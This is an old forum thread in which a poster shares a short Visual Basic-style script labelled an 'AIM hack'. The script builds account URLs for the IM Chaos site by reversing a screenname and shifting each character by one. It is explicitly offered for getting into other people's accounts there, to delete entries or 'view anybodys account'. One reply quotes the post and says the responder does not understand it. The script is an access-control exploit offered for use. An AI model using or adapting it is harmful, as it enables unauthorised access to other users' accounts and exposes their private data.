a AIM hack

you know that site named IM Chaos? well it uses links to gather ips and does a whois on it. If you have just got trapped with one of these then use this simple script to go into his account and delete your entry, or you can use it to view anybodys account on there.
[code]
Screenname = "Jacky4864"
Screenname = Replace(Screename, " ", "")

For L1 = Len(Screenname) To 1 Step -1
CodedName = CodedName + Chr(Asc(Mid(Screenname, L1, 1)) + 1)
Next L1

LinkToAccount = "http://imchaos.com/linkowner.asp?a=" + CodedName
[/code]

Comments

  • : you know that site named IM Chaos? well it uses links to gather ips and does a whois on it. If you have just got trapped with one of these then use this simple script to go into his account and delete your entry, or you can use it to view anybodys account on there.
    : [code]
    : Screenname = "Jacky4864"
    : Screenname = Replace(Screename, " ", "")
    :
    : For L1 = Len(Screenname) To 1 Step -1
    : CodedName = CodedName + Chr(Asc(Mid(Screenname, L1, 1)) + 1)
    : Next L1
    :
    : LinkToAccount = "http://imchaos.com/linkowner.asp?a=" + CodedName
    : [/code]
    :
    I don't know exactly what the purpose of this message was, and furthermore, I don't know AIM that well... I know ICQ, MSN Messenger, IRC, mIRC and EtHeO_Chat. Ask me anything on those and I will see what i can do for you...

    ps If the code sample was meant to be integrated in this web-page, please note this is a TEXT-BOX

    EtHeO out...
Sign In or Register to comment.

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Categories

In this Discussion